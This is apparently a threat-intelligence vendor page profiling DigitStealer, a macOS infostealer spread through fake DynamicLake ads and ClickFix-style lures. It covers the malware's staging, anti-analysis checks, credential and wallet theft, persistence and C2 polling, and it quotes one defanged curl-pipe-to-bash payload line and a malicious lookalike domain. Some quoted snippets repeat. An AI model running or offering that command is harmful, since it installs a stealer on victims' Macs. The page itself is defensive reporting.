DigitStealer is a macOS infostealer targeting Apple Silicon systems, particularly M2-generation and newer Macs. It uses a staged, largely fileless infection chain and execution gating to avoid virtual machines, Intel-based Macs, M1 systems, and selected regional settings. It has been distributed through fraudulent copies of the DynamicLake utility, including social-engineering lures that instruct victims to drag content into Terminal or paste commands, as well as malicious disk-image installers and deceptive advertisements.
The malware prompts victims for their macOS password and collects user documents and notes, browser credentials and data, macOS Keychain contents, cryptocurrency-wallet information, VPN configurations, and Telegram data. It targets data from Chromium-based browsers and Firefox, and can tamper with the Ledger Live wallet application, creating a risk of cryptocurrency-related data theft and malicious wallet-configuration changes. Stolen material is packaged and exfiltrated to attacker infrastructure.
DigitStealer uses AppleScript and JXA, resets macOS TCC permissions, distributes functionality across multiple payload stages, and employs hardware, locale, and virtual-machine checks to reduce analysis and detection. It establishes persistence through a Launch Agent and uses DNS TXT-record retrieval for subsequent payload delivery. Its persistent JXA component can poll command-and-control infrastructure for additional AppleScript or JavaScript tasks. DigitStealer emerged in late 2025 and has been observed in macOS-focused infostealer campaigns alongside MacSync and Atomic macOS Stealer.
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
30 distinct techniques documented for this family, organized by ATT&CK tactic.
The ad in question was posing as DynamicLake, a legitimate Mac utility... the original link seen above redirects to dynamicmacisland[.]com, a malicious lookalike domain with no ties to the actual app.
Mac users are encountering deceptive websites—often through Google Ads or malicious advertisements... During November 2025, Microsoft Defender Experts identified a WhatsApp platform abuse campaign... sends malicious attachments to all contacts using predefined messaging templates.
The final stage establishes persistence through a Launch Agent that dynamically retrieves its payload from a DNS TXT record.
Adversaries began using those same paste-and-run methods on macOS, replacing PowerShell with a combination of shell script and AppleScript code.
Once the fateful paste into a Terminal window took place, the traditional AppleScript stealer code we’ve observed in previous years executed to gather data and exfiltrate.
curl -fsSL https[:]//67e5143a9ca7d2240c137ef80f2641d6.pages[.]dev/c9c114433040497328fe9212012b1b94.aspx| bash
The ad in question was posing as DynamicLake... redirects to dynamicmacisland[.]com, a malicious lookalike domain with no ties to the actual app.
Once decoded, the dropper reveals unusually extensive anti-analysis features, including locale restrictions, VM detection, and hardware-specific sysctl checks.
The first major payload is surprisingly straightforward: an AppleScript that prompts the victim for their macOS password and immediately begins credential harvesting.
Leverage Defender’s custom detection rules to alert on abnormal access to Keychain, browser credential stores, and cloud/developer artifacts, including SSH keys, Kubernetes configs, AWS credentials, and wallet data.
These campaigns leverage... to harvest credentials, session data, secrets from browsers, keychains, and developer environments.
Families such as Atomic macOS Stealer (AMOS), MacSync, and DigitStealer now routinely harvest ... keychain secrets.
Families such as Atomic macOS Stealer (AMOS), MacSync, and DigitStealer now routinely harvest browser credentials.
Once decoded, the dropper reveals unusually extensive anti-analysis features, including locale restrictions, VM detection, and hardware-specific sysctl checks.
The memory files are not encrypted by Computer History, and other programs running under the same macOS user account may be able to read them.
The first major payload is surprisingly straightforward: an AppleScript that prompts the victim for their macOS password and immediately begins credential harvesting.
The downloaded JXA script acts as a long-running backdoor, polling the C2 server every 10 seconds for new AppleScript or JavaScript commands.
11 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Other indicator types observed in public reporting.
16 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
macOS infostealer reported to harvest browser credentials, keychain secrets, cryptocurrency wallets, and developer tokens.
A macOS stealer family also referenced through its stager component in campaign telemetry.
Another stealer malware observed in cases associated with the same malicious ad / ClickFix-style campaign targeting Mac users.
An active macOS infostealer mentioned as part of the expansion of credential-theft malware beyond Windows into macOS environments.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.